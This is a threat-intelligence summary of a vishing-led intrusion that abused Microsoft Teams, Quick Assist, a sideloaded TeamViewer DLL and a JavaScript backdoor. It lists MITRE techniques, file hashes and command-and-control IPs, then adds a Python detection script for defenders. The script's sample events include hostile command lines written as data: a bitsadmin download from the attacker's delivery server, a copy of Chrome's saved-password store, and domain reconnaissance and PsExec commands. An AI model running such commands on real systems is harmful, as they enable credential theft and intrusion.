This article outlines a sophisticated multi-stage attack that combined vishing, remote access tools and abuse of legitimate signed software to gain unauthorized access and maintain persistence. The attacker delivered a malicious PowerShell payload through Microsoft Teams, used Quick Assist for remote access, and deployed tooling including a signed TeamViewer binary with a sideloaded DLL and a JavaScript-based command-and-control backdoor. The findings emphasize the risks posed by social engineering and the implications for cybersecurity defenses. Affected: organizations, individuals, cybersecurity environment
Key points:
- A multi-stage attack leveraging vishing and remote access tools was observed.
- The attack utilized Microsoft Teams for delivering a PowerShell payload.
- Quick Assist was exploited for unauthorized remote access.
- Signed binaries like TeamViewer and a malicious DLL were deployed.
- The attack culminated in the use of a JavaScript-based C2 backdoor.
- The incident highlights social engineering vulnerabilities in organizations.
- Common techniques observed align with tactics attributed to the threat actor Storm-1811.
- Persistence mechanisms such as BITS jobs and generated LNK files were used.
MITRE Techniques:
- T1105 – Ingress Tool Transfer | Adversary transfers tools such as TeamViewer.exe to the target system.
- T1656 – Impersonation | Adversary impersonates IT/help desk personnel to carry out the attack.
- T1018 – Remote System Discovery | Uses nltest and net user for domain reconnaissance.
- T1219 – Remote Access Software | Abuse of remote support tools such as Quick Assist and TeamViewer.
- T1218 – Signed Binary Proxy Execution | Abuse of trusted signed binaries to sideload a malicious DLL.
- T1197 – BITS Jobs | BITS jobs used for stealthy data transfer and persistence.
- T1555.003 – Credentials from Web Browsers | Access to browser password stores for credential theft.
- T1021.002 – SMB/Windows Admin Shares | Use of psexec.exe for lateral movement and remote execution.
- T1570 – Lateral Tool Transfer | Copying tools such as psexec.exe across multiple systems.
- T1090 – C2 via Reverse Proxy | Use of PsExec to exfiltrate data.
Indicators of Compromise:
- [SHA256] 904280f20d697d876ab90a1b74c0f22a83b859e8b0519cb411fda26f1642f53e (TeamViewer.exe)
- [SHA256] 782e997382734a4c80b6f2c6aef51a55c9434457f5ee125a3cf5938ec7a72f55 (TV.dll)
- [SHA256] 67199aaa4c7c9a7002958588b1bd1b81deecec871933f7c88d5838deb1c47e92 (index.js)
- [IP Address] 5.252.153.81 (Final C2 Node.js Server)
- [IP Address] 5.252.153.244 (Initial Tool Delivery Server)
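As an added example (not code from the Ontinue write-up or from this page), the following Python sketches how a defender could turn the technique list and the IoC list above into detection rules and run them over endpoint telemetry. The SHA-256 values and IP addresses are the page's IoCs; the hostnames, user names, file paths and the sample events are constructed, and the location heuristics (TeamViewer.exe running outside Program Files, TV.dll loaded from the same non-standard directory) are assumptions for illustration, not behaviour the page asserts.

```python
"""Rule-based triage of constructed process / image-load / network events
against the techniques and IoCs listed for the Storm-1811-style intrusion.

Added example, not the page's code. Event shapes loosely follow Sysmon
fields (image, cmdline, sha256, loaded, dst_ip) but are simplified.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# IoCs copied from the page. Anything else in this file is constructed.
IOC_SHA256 = {
    "904280f20d697d876ab90a1b74c0f22a83b859e8b0519cb411fda26f1642f53e": "TeamViewer.exe",
    "782e997382734a4c80b6f2c6aef51a55c9434457f5ee125a3cf5938ec7a72f55": "TV.dll",
    "67199aaa4c7c9a7002958588b1bd1b81deecec871933f7c88d5838deb1c47e92": "index.js",
}
IOC_IPS = {
    "5.252.153.81": "final C2 Node.js server",
    "5.252.153.244": "initial tool delivery server",
}


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str  # MITRE ID from the page, or "C2" for an IoC IP hit
    detail: str


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _in_program_files(path: str) -> bool:
    # Heuristic (assumption): a legitimately installed TeamViewer lives here.
    p = path.lower().replace("/", "\\")
    return p.startswith("c:\\program files\\") or p.startswith("c:\\program files (x86)\\")


def detect(events: list[dict]) -> list[Finding]:
    """One rule per page technique; returns every match, in event order."""
    out: list[Finding] = []
    for ev in events:
        host, kind = ev["host"], ev["event"]
        image = ev.get("image", "")
        cmd = ev.get("cmdline", "").lower()
        name = _base(image)

        # T1105: any file whose hash is one of the published IoCs.
        sha = ev.get("sha256", "").lower()
        if sha in IOC_SHA256:
            out.append(Finding(host, "T1105", f"IoC hash match: {IOC_SHA256[sha]}"))

        if kind == "process":
            # T1219: remote-support tool running from an unusual location (heuristic).
            if name == "teamviewer.exe" and not _in_program_files(image):
                out.append(Finding(host, "T1219", f"TeamViewer.exe outside Program Files: {image}"))
            # T1018: domain reconnaissance with nltest / net user.
            if name == "nltest.exe" or (name in ("net.exe", "net1.exe") and " user " in f" {cmd} "):
                out.append(Finding(host, "T1018", f"recon command: {cmd}"))
            # T1197: BITS job creation from bitsadmin or PowerShell.
            if (name == "bitsadmin.exe" and ("/transfer" in cmd or "/create" in cmd)) \
                    or "start-bitstransfer" in cmd:
                out.append(Finding(host, "T1197", f"BITS job: {cmd}"))
            # T1021.002 / T1570: PsExec client or service binary on the host.
            if name in ("psexec.exe", "psexesvc.exe"):
                out.append(Finding(host, "T1021.002", f"PsExec activity: {cmd}"))
            # T1555.003: a shell touching a Chromium-style "Login Data" store.
            if re.search(r"\\login data", cmd):
                out.append(Finding(host, "T1555.003", f"browser credential store access: {cmd}"))
        elif kind == "imageload":
            # T1218: TV.dll pulled in by TeamViewer.exe from a non-standard directory.
            dll = ev.get("loaded", "")
            if name == "teamviewer.exe" and _base(dll) == "tv.dll" and not _in_program_files(dll):
                out.append(Finding(host, "T1218", f"probable DLL sideload: {dll}"))
        elif kind == "network":
            dst = ev.get("dst_ip", "")
            if dst in IOC_IPS:
                out.append(Finding(host, "C2", f"connection to {dst} ({IOC_IPS[dst]})"))
    return out


def techniques_by_host(findings: list[Finding]) -> dict[str, set[str]]:
    by: dict[str, set[str]] = {}
    for f in findings:
        by.setdefault(f.host, set()).add(f.technique)
    return by


# Constructed telemetry: WS01 shows the full chain, WS02 the lateral hop,
# WS03 a legitimately installed TeamViewer that must not alert.
TMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"host": "WS01", "event": "process", "image": TMP + r"\TeamViewer.exe", "cmdline": "TeamViewer.exe",
     "sha256": "904280f20d697d876ab90a1b74c0f22a83b859e8b0519cb411fda26f1642f53e"},
    {"host": "WS01", "event": "imageload", "image": TMP + r"\TeamViewer.exe", "loaded": TMP + r"\TV.dll",
     "sha256": "782e997382734a4c80b6f2c6aef51a55c9434457f5ee125a3cf5938ec7a72f55"},
    {"host": "WS01", "event": "process", "image": r"C:\Windows\System32\nltest.exe", "cmdline": "nltest /domain_trusts"},
    {"host": "WS01", "event": "process", "image": r"C:\Windows\System32\net.exe", "cmdline": "net user /domain"},
    {"host": "WS01", "event": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://5.252.153.244/x C:\Users\Public\x"},
    {"host": "WS01", "event": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c copy "C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\Users\Public\ld'},
    {"host": "WS01", "event": "network", "image": TMP + r"\node.exe", "dst_ip": "5.252.153.81"},
    {"host": "WS02", "event": "process", "image": r"C:\Users\Public\psexec.exe", "cmdline": r"psexec.exe \\WS03 -s cmd"},
    {"host": "WS03", "event": "process", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe", "cmdline": "TeamViewer.exe"},
]


def run_sample() -> list[Finding]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.host:5} {f.technique:10} {f.detail}")
```

The rules are deliberately narrow (one per listed technique) so that each hit can be traced back to a row in the technique table; in a real deployment the TeamViewer location check would be tuned to the organisation's approved install paths and the hash rule fed from a regularly refreshed IoC feed rather than a hard-coded dictionary.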
Full Story: https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/